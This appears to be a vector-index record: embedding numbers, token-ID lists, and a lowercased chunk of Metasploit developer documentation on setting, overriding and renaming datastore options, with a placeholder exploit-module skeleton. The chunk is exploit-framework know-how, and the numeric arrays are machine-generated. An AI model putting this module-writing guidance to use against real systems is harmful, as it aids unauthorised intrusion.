-0.09732092916965485, 0.9483462572097778, -0.38583654165267944, 0.06598886102437973, -0.27390751242637634, -0.2190399467945099, -0.22021432220935822, -0.4983105957508087, -0.8382839560508728, -0.4302510917186737, 0.9248578548431396, -0.5645855665206909, 0.11132466048002243, 0.3610475957393646, 0.10113830119371414, -0.4043131470680237, -0.20254485309123993, -0.7158519625663757, -1.1124422550201416, 0.11956661194562912, 0.4371925890445709, 0.828057587146759, -0.5796511769294739, -0.6850553154945374, 0.1587308794260025, 0.1660480946302414, 0.13090640306472778, 0.4593398869037628, -0.14483420550823212, 0.10829336196184158, 0.21928220987319946 ]
[ 1010, 1998, 2059, 3191, 1996, 5371, 4426, 1012, 3642, 2742, 1024, 23569, 3367, 4892, 1012, 2047, 1006, 1005, 2026, 22199, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 2026, 22199, 5724, 1005, 1010, 1005, 2023, 2003, 1037, 12398, 3643, 1005, 1033, 1007, 25719, 1998, 4315, 13910, 12911, 2075, 11336, 7047, 1996, 4236, 1035, 7047, 4118, 10760, 4236, 1035, 7047, 4118, 2064, 4236, 3674, 3937, 2951, 23809, 2063, 7047, 1012, 3937, 2951, 23809, 2063, 7047, 2024, 1996, 3924, 2008, 2593, 2442, 2022, 26928, 1010, 2107, 2004, 1996, 1054, 15006, 2102, 5724, 1999, 1037, 8241, 1011, 2217, 18077, 1012, 2030, 2009, 1521, 1055, 2200, 4141, 2109, 1010, 2107, 2004, 2536, 5310, 18442, 1013, 20786, 7047, 2179, 1999, 1037, 8833, 2378, 11336, 1012, 1996, 2206, 2003, 2019, 2742, 1997, 25719, 3674, 2951, 23809, 2063, 7047, 1999, 1037, 11336, 1024, 4236, 1035, 7047, 1006, 1031, 23569, 3367, 4892, 1012, 2047, 1006, 1005, 3395, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 3395, 1005, 1033, 1007, 1010, 23569, 3367, 4892, 1012, 2047, 1006, 1005, 4471, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 4471, 1005, 1033, 1007, 1033, 1007, 1996, 4236, 1035, 3935, 1035, 7047, 4118, 10760, 4236, 1035, 3935, 1035, 7047, 4118, 2064, 4236, 3674, 3935, 2951, 23809, 2063, 7047, 1012, 3935, 2951, 23809, 2063, 7047, 2024, 1996, 3924, 2008, 2196, 5478, 1996, 5310, 2000, 9530, 8873, 27390, 2063, 2077, 2478, 1996, 11336, 1012, 2005, 2742, 1010, 1996, 4013, 16898, 2015, 5724, 2003, 2471, 2467, 2641, 2004, 1523, 3935, 1524, 1012, 2021, 1997, 2607, 1010, 2009, 2064, 2036, 2812, 2008, 1521, 1055, 2242, 2008, 2087, 5310, 2097, 2424, 3697, 2000, 9530, 8873, 27390, 2063, 1012, 2019, 2742, 1997, 4236, 2019, 3935, 5724, 1024, 4236, 1035, 3935, 1035, 7047, 1006, 1031, 23569, 18447, 1012, 2047, 1006, 1005, 2051, 5833, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 2051, 5833, 1010, 1999, 3823, 1005, 1010, 3438, 1033, 1007, 1033, 1007, 1996, 4315, 13910, 12911, 1035, 7047, 4118, 10760, 4315, 13910, 12911, 1035, 7047, 4118, 2064, 4315, 13910, 12911, 2593, 3937, 2030, 3935, 7047, 1012, 8192, 2003, 2428, 3442, 1011, 2830, 1024, 4315, 13910, 12911, 1035, 7047, 1006, 1005, 5724, 2487, 1005, 1010, 1005, 5724, 2475, 1005, 1010, 1005, 5724, 2509, 1005, 1007, 5278, 1996, 12398, 3643, 2005, 1037, 2951, 23809, 2063, 5724, 2860, 10222, 1037, 2951, 23809, 2063, 5724, 2003, 2525, 5068, 2011, 1037, 4666, 2378, 1010, 2045, 2024, 2145, 3971, 2000, 2689, 1996, 12398, 3643, 2013, 1996, 11336, 1012, 2017, 2064, 2593, 2224, 1996, 4236, 1035, 7047, 4118, 1010, 2030, 5815, 1037, 12398, 7361, 9285, 3145, 1999, 1996, 11336, 1521, 1055, 27425, 1012, 2478, 1996, 12398, 7361, 9285, 3145, 2003, 6871, 2138, 1996, 5724, 1521, 1055, 6412, 1998, 2060, 12332, 2097, 3961, 15704, 1012, 2478, 4236, 1035, 7047, 2000, 2689, 1996, 12398, 3643, 5643, 1997, 1996, 12637, 1997, 2478, 4236, 1035, 7047, 2003, 2008, 2065, 1996, 2951, 23809, 2063, 5724, 2003, 3935, 1010, 2023, 4473, 2009, 2000, 2022, 2006, 1996, 3937, 5724, 12183, 1010, 3574, 2043, 2111, 2079, 1523, 2265, 7047, 1524, 2006, 5796, 11329, 5644, 9890, 1010, 2008, 5724, 2097, 2022, 2045, 2612, 1012, 2017, 2036 ]
metasploit
116.txt
4
get to change the option description, and whether it should be required or not with this method. using defaultoptions to change the default valuewhen metasploit initializes a module, an import _ defaults method is called. this method will update all existing datastore options ( which is why register _ options can be used to update default values ), and then it will specifically check the defaultoptions key from the module ’ s metadata, and update again. here ’ s an example of an exploit module ’ s initialize portion with the defaultoptions key : def initialize ( info = { } ) super ( update _ info ( info,'name'= >'module name ','description'= > % q { this is an example of setting the default value of rport using the defaultoptions key },'license'= > msf _ license,'author'= > ['name'],'references'= > [ ['url ','' ] ],'platform'= >'win ','targets'= > [ ['windows ', {'ret'= > 0x41414141 } ] ],'payload'= > {'badchars'= > " \ x00 " },'defaultoptions'= > {'rport'= > 8080 },'privileged'= > false,'disclosuredate'= >'','defaulttarget'= > 0 ) ) end modifying datastore options at run - timecurrently, the safest way to modify a datastore option at run - time is to override a method. for example, some mixins retrieve the rport option like this : def rport datastore ['rport'] end in that scenario, you can override this rport method from your module, and return a different value : def rport 80 end this way, when a mixin wants that information, it will end up with the value 80, and not whatever is actually in datastore ['rport']. ideal datastore namingnormal options are always uppercase, advanced options are camelcase, advanced options with a similar purpose are prefixed : : camelcase. renaming datastore optionsoptions can be renamed and retain backward compatibility by using the alias : keyword argument in the new option. for example, to rename oldoption to newoption, the
[ -0.7525948882102966, -0.3285583257675171, -0.33677151799201965, 0.5774511098861694, -0.7201119661331177, -0.4622199237346649, 0.06629260629415512, 0.16589298844337463, -0.01440356858074665, 0.7955050468444824, 0.4074484705924988, 0.3090478181838989, 0.604710578918457, 0.2489980310201645, -0.6779167652130127, -0.3206174075603485, -0.7813404202461243, -0.07908234745264053, -0.9789534211158752, 0.12662075459957123, 0.043640002608299255, -0.30059683322906494, -0.4467219114303589, -0.8695880174636841, -0.4884074926376343, 0.4714445471763611, 0.08076637983322144, -0.5377301573753357, 0.4448222219944, 0.6675732731819153, -0.1890101134777069, -0.1831715852022171, 0.22259727120399475, -0.53645920753479, -0.1869610697031021, -0.1309509426355362, 0.37863829731941223, -0.6440618634223938, -0.3350379765033722, -0.47640952467918396, 0.8318958282470703, -0.09497293829917908, 0.07439739257097244, -0.5463017225265503, -0.5675002336502075, -0.1539238542318344, -0.3346415162086487, 0.16436249017715454, -0.012047039344906807, -0.7839126586914062, 0.096443772315979, 0.11926402896642685, 0.3276265263557434, 0.43096449971199036, -0.3073510229587555, 0.09702052175998688, -0.625119149684906, 0.06443417072296143, -0.16054731607437134, 0.3556510806083679, -0.20871219038963318, 0.46827882528305054, 0.45138564705848694, -0.5492393374443054, 0.353373259305954, 0.29020965099334717, 0.12364763766527176, -0.3561389446258545, -0.665134072303772, -0.17174236476421356, -0.2825058400630951, 0.6722203493118286, -0.4368557929992676, -1.0364468097686768, -0.33537429571151733, 0.2602742314338684, 0.012969046831130981, -0.6882078051567078, -0.3814311921596527, 0.2272796332836151, 0.11826706677675247, 0.7732709646224976, 0.15938621759414673, -0.32591012120246887, -0.667070209980011, 0.046899598091840744, 0.570820689201355, 0.563825249671936, -0.32539984583854675, 0.5677160024642944, -0.19788490235805511, 0.3455007076263428, -0.29021456837654114, -0.4521081745624542, 0.4447876513004303, 0.7652775645256042, -0.1852346509695053, 0.1485886424779892, 0.4766998589038849, -0.7817440629005432, 0.7365179061889648, 0.6684384942054749, 0.6361991763114929, -0.09698789566755295, 0.32983124256134033, 0.4406004250049591, 0.23149923980236053, 0.17760957777500153, -0.35674604773521423, -0.3052741289138794, 0.48147547245025635, -0.33463194966316223, 0.447488397359848, -0.86943119764328, -0.4021681845188141, 1.0330204963684082, 0.3202321231365204, -0.38868504762649536, -0.10088500380516052, 0.1915602684020996, 0.2677207291126251, -0.1540718376636505, -0.09067321568727493, -0.5165215730667114, 0.14414328336715698, -0.03493104130029678, 0.45564836263656616, 0.22411538660526276, -0.5923988819122314, -0.48431146144866943, -0.3148994445800781, -0.344845712184906, -0.18332171440124512, 1.0670355558395386, 0.04228733107447624, 0.27356210350990295, 0.12228187173604965, 0.6630169153213501, 0.22679120302200317, -0.8453123569488525, 0.35666391253471375, 0.8702213168144226, 0.09351211786270142, 1.2547928094863892, 0.3265443742275238, -0.22449612617492676, -0.6160517930984497, 0.05394631624221802, -0.7401176691055298, 0.35534772276878357, -0.09136349707841873, -0.05369948968291283, 0.8038852214813232, -0.3276497721672058, -0.21775823831558228, -0.38583749532699585, -0.5424407124519348, 0.8868523836135864, -0.21684762835502625, -0.3032962381839752, 0.463880717754364, 1.1432392597198486, -0.04053525999188423, 0.5947901606559753, 0.09448269009590149, 0.3837953805923462, -0.7938116192817688, -0.5437531471252441, -0.4828345775604248, 0.24118784070014954, 0.4683750867843628, 0.3883915841579437, 0.5082443952560425, 0.33227697014808655, 1.0090304613113403, 0.6227893829345703, 0.39825648069381714, -0.4614175856113434, -0.3096635937690735, 1.0032753944396973, -0.19670908153057098, 0.9243420958518982, 0.12074781954288483, 0.7114874124526978, -0.3132299780845642, -0.11916821449995041, 0.23563233017921448, -0.8325125575065613, -0.04505909979343414, 0.13950583338737488, -0.24201509356498718, 0.4643712639808655, -0.3276016116142273, 0.6927909851074219, 0.3682243227958679, 0.014168213121592999, -0.8156314492225647, 0.2172960340976715, -0.021822968497872353, -0.727073073387146, -0.110908143222332, 0.4488336443901062, -0.3724818229675293, 0.8053314089775085, 0.22420169413089752, -0.7937193512916565, 0.5414376854896545, 0.4457329213619232, 0.5148108601570129, 0.44649022817611694, 0.6421213746070862, 0.026683779433369637, -0.9707483649253845, -0.12886019051074982, -0.059432197362184525, -0.47539886832237244, 0.04636922478675842, 0.44070494174957275, -0.3822211027145386, 0.3507021963596344, 0.21073012053966522, 0.4145612418651581, 0.8486658334732056, 0.6336999535560608, 0.07751229405403137, -0.4464717507362366, 0.19638101756572723, 0.16162584722042084, 0.03518185019493103, 0.312112957239151, -0.029559727758169174, 1.112288236618042, 0.5985035300254822, 1.0355101823806763, 0.09091142565011978, -0.49567997455596924, 0.07682338356971741, 0.49274733662605286, -0.1332494616508484, -0.20518623292446136, 0.14067773520946503, 1.1665533781051636, 0.3393087387084961, -0.23400244116783142, -0.37311625480651855, 0.07049529254436493, 0.2238636165857315, 0.13397225737571716, -0.09263839572668076, 1.1056082248687744, 0.04204164072871208, 0.4110274016857147, -0.3113982677459717, -0.9496335387229919, -0.86324143409729, -0.049565866589546204, 0.41906943917274475, 0.16896216571331024, -0.2973118722438812, -0.5539641380310059, 0.6611849665641785, -0.04712427780032158, -0.44738319516181946, -0.44084057211875916, 0.41972312331199646, 0.7220449447631836, -0.4482246935367584, 0.3352036476135254, -0.13348056375980377, -1.2745953798294067, -0.5448238253593445, -0.3787294030189514, -0.5507543087005615, -0.9199427366256714, -0.8124721646308899, 0.3314974904060364, 0.1308053433895111, 0.2729399800300598, 0.6910804510116577, -0.673663854598999, -0.6056006550788879, 0.13298845291137695, 0.4537516236305237, 0.3670823276042938, 0.2805192470550537, 0.08007517457008362, -0.5668826699256897, -0.34671300649642944, -0.3736855983734131, 0.4798533320426941, -0.35993194580078125, -0.12259256839752197, 0.04095807299017906, -0.39020204544067383, 0.08483098447322845, 0.2813768684864044, 0.7343460321426392, -0.11060163378715515, 0.20016542077064514, -0.10017341375350952, -0.3974609673023224, 0.11320173740386963, 0.23728244006633759, -0.11339130252599716, -0.31218135356903076, 0.15615114569664001, 0.08721274882555008, 0.3052533268928528, 0.671158492565155, 0.8708508014678955, -0.5866416096687317, -0.01699204370379448, 0.393830269575119, 0.4005233943462372, -0.8505085706710815, 0.06255212426185608, 0.12723444402217865, -0.0038183953147381544, 0.31814584136009216, -0.23655380308628082, -0.10499642789363861, 0.19002477824687958, 0.07496967911720276, -0.09245070815086365, -0.582904577255249, 0.5663406848907471, -0.45548856258392334, -0.8179439306259155, 0.3325556218624115, -0.7854896783828735, -0.4601057469844818, 0.04749682545661926, -0.07407913357019424, 0.4340381324291229, 0.35149478912353516, 0.48154494166374207, -0.1259457767009735, -0.1203935295343399, 0.32738614082336426, 0.45181047916412354, 0.44586196541786194, -0.39416077733039856, 0.5313432216644287, -0.37922489643096924, -0.01155797578394413, 0.38544943928718567, 0.45889607071876526, -0.5285576581954956, -0.4306730329990387, -0.4180838167667389, -0.06841155886650085, -0.019151074811816216, 0.27390196919441223, 0.5745216608047485, 0.7112324237823486, 0.379902720451355, -0.6765877604484558, 0.19754350185394287, 0.3497954308986664, 0.4865107536315918, 0.9146759510040283, -0.49190592765808105, -0.4093102812767029, -0.43572500348091125, -0.6374496817588806, -0.3983210027217865, -0.23895438015460968, 0.8112684488296509, 0.4376668930053711, 0.35754337906837463, 0.6967796087265015, -0.09780499339103699, -0.2902248501777649, 0.6723549962043762, 0.05378565192222595, -0.4058228135108948, 1.0565468072891235, -0.19046318531036377, 0.5700108408927917, 0.06044081971049309, 0.20900790393352509, -0.6814519166946411, -0.044897496700286865, 0.06931507587432861, 0.2839740514755249, -0.2546978294849396, -0.8311313986778259, -0.049113377928733826, -0.3081545829772949, 0.0520855113863945, 0.009396250359714031, -0.02609681524336338, 0.6140983700752258, 0.32606440782546997, -0.7780967354774475, -0.08351769298315048, 0.9842730760574341, 1.1272042989730835, 0.6245553493499756, 0.4377308189868927, 1.2023283243179321, 0.570878803730011, -0.425128698348999, 0.14933522045612335, -0.6810349822044373, 0.4667225480079651, -0.2568237781524658, 0.600458562374115, -0.16136284172534943, 0.2728354036808014, 0.08699795603752136, -0.25699442625045776, -0.16956235468387604, -0.09172855317592621, 0.041462186723947525, -0.20308725535869598, -0.9702576398849487, -0.545869767665863, 0.4703069031238556, 0.10110972821712494, -0.6081804633140564, -0.10680155456066132, 0.02581978030502796, 0.1753029078245163, 1.0881695747375488, -0.5388112664222717, 0.5641797184944153, -0.9074172973632812, -0.2803969979286194, 0.21661970019340515, -0.29556360840797424, -0.722861647605896, -0.9988475441932678, 0.48599404096603394, -0.8451639413833618, 0.478045254945755, 0.80793297290802, -0.2666134834289551, -0.06163166090846062, -0.7450751066207886, -0.6500833034515381, 0.6811544895172119, -0.5722463130950928, -0.6172174215316772, -0.19325341284275055, 0.39610904455184937, -0.40102601051330566, 0.15534870326519012, -0.9187833666801453, 0.15182466804981232, 0.2629164755344391, -0.30991703271865845, 0.863854706287384, -0.9547001123428345, 0.7441193461418152, 0.26360565423965454, -0.5255385041236877, -0.11347038298845291, 0.49019917845726013, -0.730921745300293, 0.11223779618740082, -0.7448064088821411, -0.05138704925775528, -0.12371128797531128, -0.47711116075515747, 0.43518051505088806, -0.6502487063407898, 0.07003950327634811, 0.39580920338630676, 0.3924802541732788, -0.3671606481075287, 0.392922580242157, 0.4276916980743408, -0.4479832649230957, 0.21893151104450226, -0.9438159465789795, 1.1579906940460205, 0.1584293246269226, 0.07001875340938568, 0.5714675188064575, -0.8593348860740662, 1.154654622077942, 0.28539973497390747, 0.41915178298950195, -0.8597629070281982, -0.6259193420410156, 0.06136283278465271, 0.5091246366500854, -0.009656284004449844, 0.7193519473075867, -0.23587816953659058, -0.08321364223957062, -0.706178605556488, -0.23359346389770508, -0.6407520771026611, -0.35437503457069397, -0.002683858620002866, 0.17730028927326202, 0.06146596372127533, 0.2921256721019745, 0.4448152184486389, -0.2615070641040802, -1.0309797525405884, 0.4738779664039612, -0.3749825358390808, -0.3573903441429138, -1.2901979684829712, -0.7669034600257874, -0.36656567454338074, 0.5338513255119324, -0.5603123307228088, 0.28448572754859924, -0.3221298158168793, 0.07851940393447876, 0.05651059374213219, 0.18052855134010315, 0.5466400384902954, -0.3749847710132599, -0.0020788731053471565, 0.3560499846935272, -0.19930791854858398, -0.8119559288024902, 0.4131568670272827, 0.6308485269546509, -0.295442134141922, 0.2112964540719986, -0.8088643550872803, 0.022807423025369644, -0.9959239959716797, -0.2847660779953003, 0.32706794142723083, -0.21489810943603516, 0.6280169486999512, -1.0582407712936401, -0.9398366808891296, -0.7815430164337158, 0.5279738903045654, 0.07385936379432678, -0.869735836982727, 0.49327588081359863, 0.03819052129983902, 0.15943986177444458, -0.12331647425889969, -0.29886868596076965, -0.04920603707432747, -0.719316840171814, 0.061779189854860306, 0.33662381768226624, 0.2725764214992523, -0.20874200761318207, -0.09266460686922073, 0.32472339272499084, 0.6227086782455444, 0.1354481279850006, -0.8430777192115784, -0.21955126523971558, -0.12227004021406174, 0.3342360258102417, -0.889286994934082, 0.1434871256351471, -0.504206657409668, 0.3859577476978302, -0.1731959581375122, 0.5582569241523743, 0.03056020475924015, -0.2742215692996979, 0.38016217947006226, 0.25778400897979736, 0.7377794981002808, -0.6113007664680481, -0.3258189260959625, -0.2670990526676178, 0.9675269722938538, 0.08531760424375534, -0.4414774179458618, -0.20557066798210144, 0.2896488904953003, -0.889441192150116, -1.2461711168289185, 0.7952260375022888, -0.19022773206233978, -0.08310029655694962, -0.16472101211547852, -0.5719768404960632, 0.9775642156600952, -0.19088004529476166, 0.14193621277809143, 0.8940302729606628, 0.44810473918914795, 0.2928246557712555, -0.6460568904876709, 0.3047375977039337, 0.86775803565979, -0.0020486204884946346, 0.15884296596050262, -0.33026543259620667, -0.02880067750811577, 0.24796488881111145, -0.1933142989873886, -0.1249396875500679, -0.48645976185798645, -0.2442949116230011, 0.5004333257675171, 0.021320173516869545, 0.6840604543685913, -0.4658680260181427, -0.8233358860015869, -0.6794441938400269, 0.04948054999113083, 0.21734566986560822, -0.10772017389535904, 0.3155190348625183, 0.16810330748558044, 0.48147520422935486, 0.07377565652132034, 0.3938709795475006, 0.11843795329332352, -0.2289932817220688, 0.6849300861358643, -0.0878278836607933, -0.8056284189224243, 0.8318718075752258, 0.3290061056613922, -0.8463271260261536, -0.5035978555679321, -1.1492483615875244, -0.0878421738743782, -0.41894280910491943, -0.5464981198310852, -0.684648871421814, 0.3429971933364868, -0.11409320682287216, 0.22672313451766968, 0.3519291579723358, 0.03373579680919647, 0.37716951966285706, -0.5849210619926453, 0.2193482220172882, -0.06539806723594666, -0.4931051731109619, 0.24111294746398926, -0.5473366975784302, 0.21620960533618927, -0.8000879883766174, -0.1489003449678421, 0.5563891530036926, -0.19102337956428528, 1.0992553234100342, -0.4562104344367981, 0.5654761791229248, -0.12706732749938965, 0.11977244913578033, 1.1323745250701904, 0.3088504672050476, 0.5936300158500671, 0.8319472670555115, -0.05942153558135033, -0.17726562917232513, -0.4002627432346344, 0.24995273351669312, 0.06224922463297844, 0.5282775163650513, -0.11263158172369003, -0.2246057242155075, 0.13034272193908691, -0.040664877742528915, -0.27897316217422485, -0.7613775730133057, -0.5084567666053772, -1.0201529264450073, -0.21674920618534088, -0.1789657026529312, -0.5531033873558044, -0.43941736221313477, 0.1605742871761322, -0.38511326909065247, -0.3213621973991394, -0.06584832072257996, 0.24652153253555298, 0.2537056505680084, 0.1912616342306137, -0.0652344673871994, -0.2917254567146301, -0.6167513132095337, -0.888535737991333, -0.7000288963317871, -0.41899698972702026, -0.6538601517677307, -0.30280348658561707, 0.0842435359954834, -0.257809579372406, -0.8231386542320251, 0.4503270089626312, -0.8619090914726257, 0.2917878031730652, -0.4724735617637634, -0.760258138179779, -0.13416321575641632, 0.31175729632377625, -0.637898325920105, 0.40986168384552, 0.20954391360282898, 0.5085386633872986, -0.015547944232821465, -0.9232552647590637, -0.4547635018825531, 0.39966800808906555, 0.33020126819610596, 0.41560858488082886, -0.12286379188299179, -0.5819138288497925, 0.6629080176353455, 0.19567009806632996, -0.6797904968261719, 0.16851967573165894, -0.9481802582740784, 0.2061038315296173, 0.02429080195724964, -0.35559362173080444, 0.515514612197876, 0.8020728826522827, 0.7728298306465149, 0.14636652171611786, -0.38650989532470703, 0.1516840010881424, 0.42262011766433716, -0.6917920708656311, 0.041955456137657166, 0.18919777870178223, 0.1622290313243866, -0.714738667011261, 0.41958439350128174, 0.540280282497406, -0.3921540379524231, 0.2144717276096344, -0.19655834138393402, -0.06633047014474869, -0.5255906581878662, -0.16917049884796143, 0.020059652626514435, 0.5948699116706848, 0.18661245703697205, 0.39603349566459656, 0.2421528398990631, -0.5313786268234253, -0.5186125636100769, 0.46982166171073914, -0.5034584999084473, -0.202083021402359, 0.45058971643447876, -0.08325928449630737, -0.529967725276947, -0.6703583598136902, -0.2965279221534729, -0.23077763617038727, 0.42069128155708313, 0.20456263422966003, 0.7780762314796448, 0.0735536441206932, -0.17820394039154053, 1.360028862953186, -0.34855082631111145, -0.4998648464679718, 0.0036939471028745174, 0.7672305703163147, -0.7563492655754089, -0.5282095670700073, 0.4859117269515991, 0.6363716125488281, 0.28137698769569397, -0.3556044399738312, -0.6501367688179016, 0.23692189157009125, -0.03494091331958771, 0.04343682900071144, 0.469011127948761, -0.14862586557865143, -0.6138519048690796, 0.025141926482319832, -0.7914317846298218, -0.14942726492881775, -0.2323361486196518, 0.12624900043010712, -0.010175904259085655, -0.16351871192455292, 0.14725391566753387, 0.8089922666549683, -0.31646615266799927, -0.44872793555259705, 0.6475121974945068, 0.33346956968307495, -0.1139194592833519, -0.9867623448371887, -0.3020790219306946, -0.12145830690860748, 0.15556874871253967, 0.5411528944969177, 0.6955715417861938, 0.5862196087837219, -0.05173931270837784, 0.45252883434295654, -0.540619432926178, -0.5385356545448303, 0.44824641942977905, 0.48286983370780945, -0.2712327539920807, 0.3182623088359833, 0.030712123960256577, -0.22629866003990173, -0.29737716913223267, -0.2354080229997635, 0.047440942376852036, 0.45613232254981995, 0.48095837235450745, 0.18677277863025665, -0.09229816496372223, 0.45570409297943115, -0.07806846499443054, 0.7159013748168945, -0.017190800979733467, -0.03338601812720299, 0.4188683032989502, -0.06649801880121231, -0.5163795351982117, 0.246260404586792, 1.1978423595428467, 0.16332067549228668, -0.2242775559425354, 0.780961275100708, 0.36487439274787903, -0.054108455777168274, -0.37095698714256287, -0.03573183715343475, -0.2357533872127533, -0.3443625271320343, -0.14944063127040863, -1.298913836479187, -0.14669527113437653, 0.08260014653205872, 0.22597821056842804, 0.18323425948619843, 0.07031293213367462, -0.5138581395149231, 0.47987329959869385, -0.6853184700012207, 0.23678778111934662, 0.16423238813877106, 0.19861280918121338, -0.18601638078689575, -0.21779891848564148, -0.6120116710662842, 0.8194257020950317, 0.191227525472641, 0.6939237117767334, -0.036746665835380554, 1.2159423828125, -0.0358874686062336, -0.31563600897789, 0.08845821022987366, -0.21786892414093018, -0.4971536695957184, 0.04892692342400551, -0.12493038922548294, -0.09102226048707962, 0.5102941393852234, 0.47211116552352905, 0.2783997356891632, -0.07605534046888351, -0.05173560604453087, -0.8827991485595703, 0.15599019825458527, -0.2708974778652191, -0.3815579116344452, 0.5596160888671875, 0.29131487011909485, -0.7499028444290161, 0.07770977914333344, -0.03831741586327553, 0.32304924726486206, 0.6533038020133972, -0.4965444803237915, -0.4780464470386505, -0.9245944619178772, 0.3646555244922638, -0.11826328188180923, 0.741363525390625, -0.4449315369129181, -0.2398182451725006, 0.22754471004009247, -0.706062376499176, 0.00508431252092123, 0.36595654487609863, -0.5928201675415039, -0.6227769255638123, 0.7852896451950073, 0.0051686931401491165, 0.3172728717327118, 0.43936970829963684, -0.27126041054725647, 0.08345981687307358, -0.29004859924316406, 1.1442581415176392, 0.07570816576480865, 0.3110024333000183, 0.3848920166492462, 0.1642116904258728, -0.4917517304420471, 0.09896804392337799, 0.8483263850212097, -0.03222214803099632, -0.11816467344760895, -0.07703761756420135, 0.16733084619045258, -0.35326939821243286, -0.591154932975769, -0.23129796981811523, -0.0659727081656456, -0.2636454403400421, -0.07083281874656677, -0.6788582801818848, -0.2096969038248062, -0.15972110629081726, -0.26235079765319824, -0.07841051369905472, 0.41876792907714844, 0.043262600898742676, -0.12614013254642487, 0.8798202276229858, -1.2246484756469727, 4.368661403656006, 0.16025832295417786, 0.45249131321907043, -0.132008358836174, 0.22168302536010742, 0.9500141143798828, 0.6602630019187927, -0.5905471444129944, 0.3505576550960541, -0.7010164260864258, 0.12018958479166031, 0.000846397306304425, 0.20013892650604248, 0.14454403519630432, 0.0507466159760952, 0.4605768918991089, -0.6728860139846802, 0.30046793818473816, 0.759735643863678, -0.9017796516418457, -0.4478209316730499, 0.29006367921829224, -0.3963378071784973, 0.5575047135353088, -0.1262296736240387, 0.5752692818641663, -0.4032636284828186, -0.9030548930168152, -0.07772883772850037, -0.4999295473098755, 0.46855881810188293, -0.8793119192123413, 0.022611552849411964, -0.008759214542806149, -0.7764313220977783, -0.300481379032135, -0.18840982019901276, -0.4278690218925476, -0.658240556716919, -0.2196142077445984, 0.9051958322525024, -0.09380917251110077, -0.1734471172094345, 0.008837038651108742, 0.3759031891822815, -0.05435773357748985, -0.7790342569351196, 0.5969056487083435, 0.4544171988964081, -0.5116398930549622, 0.3987942337989807, -0.00779275456443429, 0.6138836741447449, -0.2394976019859314, -0.537571132183075, 0.8513226509094238, 0.74505215883255, -0.9177652597427368, 0.02896617352962494, -0.20236019790172577, 0.47658249735832214, -0.3910060524940491, 0.011973937042057514, -0.7193642854690552, -0.7557312250137329, 0.21421200037002563, 0.07163242995738983, 0.2007358819246292, 0.16295526921749115, 0.055405888706445694, -0.6679801940917969, -0.19141776859760284, -0.5050355195999146, -0.6947917938232422, 0.3534066379070282, -0.5687047839164734, 0.32447874546051025, 0.4250275492668152, 0.6483567357063293, -0.9571931958198547, -0.2983693778514862, -0.12242177873849869, -1.0251922607421875, 0.1830005794763565, 0.7147601842880249, 0.24645070731639862, -0.5438533425331116, -0.5670537352561951, -0.2398511916399002, 0.03760818392038345, 0.3365325927734375, 1.0951273441314697, 0.05044374242424965, 0.24698281288146973, 0.277660995721817 ]
[ 2131, 2000, 2689, 1996, 5724, 6412, 1010, 1998, 3251, 2009, 2323, 2022, 3223, 2030, 2025, 2007, 2023, 4118, 1012, 2478, 12398, 7361, 9285, 2000, 2689, 1996, 12398, 3643, 2860, 10222, 18804, 13102, 4135, 4183, 3988, 10057, 1037, 11336, 1010, 2019, 12324, 1035, 12398, 2015, 4118, 2003, 2170, 1012, 2023, 4118, 2097, 10651, 2035, 4493, 2951, 23809, 2063, 7047, 1006, 2029, 2003, 2339, 4236, 1035, 7047, 2064, 2022, 2109, 2000, 10651, 12398, 5300, 1007, 1010, 1998, 2059, 2009, 2097, 4919, 4638, 1996, 12398, 7361, 9285, 3145, 2013, 1996, 11336, 1521, 1055, 27425, 1010, 1998, 10651, 2153, 1012, 2182, 1521, 1055, 2019, 2742, 1997, 2019, 18077, 11336, 1521, 1055, 3988, 4697, 4664, 2007, 1996, 12398, 7361, 9285, 3145, 1024, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 11336, 2171, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2023, 2003, 2019, 2742, 1997, 4292, 1996, 12398, 3643, 1997, 1054, 6442, 2478, 1996, 12398, 7361, 9285, 3145, 1065, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 2171, 1005, 1033, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 1005, 1033, 1033, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 1010, 1005, 7889, 1005, 1027, 1028, 1031, 1031, 1005, 3645, 1005, 1010, 1063, 1005, 2128, 2102, 1005, 1027, 1028, 1014, 2595, 23632, 23632, 23632, 23632, 1065, 1033, 1033, 1010, 1005, 18093, 1005, 1027, 1028, 1063, 1005, 2919, 7507, 2869, 1005, 1027, 1028, 1000, 1032, 1060, 8889, 1000, 1065, 1010, 1005, 12398, 7361, 9285, 1005, 1027, 1028, 1063, 1005, 1054, 6442, 1005, 1027, 1028, 3770, 17914, 1065, 1010, 1005, 21598, 1005, 1027, 1028, 6270, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 1005, 1010, 1005, 12398, 7559, 18150, 1005, 1027, 1028, 1014, 1007, 1007, 2203, 29226, 2951, 23809, 2063, 7047, 2012, 2448, 1011, 2051, 10841, 14343, 20630, 1010, 1996, 3647, 3367, 2126, 2000, 19933, 1037, 2951, 23809, 2063, 5724, 2012, 2448, 1011, 2051, 2003, 2000, 2058, 15637, 1037, 4118, 1012, 2005, 2742, 1010, 2070, 4666, 7076, 12850, 1996, 1054, 6442, 5724, 2066, 2023, 1024, 13366, 1054, 6442, 2951, 23809, 2063, 1031, 1005, 1054, 6442, 1005, 1033, 2203, 1999, 2008, 11967, 1010, 2017, 2064, 2058, 15637, 2023, 1054, 6442, 4118, 2013, 2115, 11336, 1010, 1998, 2709, 1037, 2367, 3643, 1024, 13366, 1054, 6442, 3770, 2203, 2023, 2126, 1010, 2043, 1037, 4666, 2378, 4122, 2008, 2592, 1010, 2009, 2097, 2203, 2039, 2007, 1996, 3643, 3770, 1010, 1998, 2025, 3649, 2003, 2941, 1999, 2951, 23809, 2063, 1031, 1005, 1054, 6442, 1005, 1033, 1012, 7812, 2951, 23809, 2063, 10324, 12131, 9067, 7047, 2024, 2467, 3356, 18382, 1010, 3935, 7047, 2024, 19130, 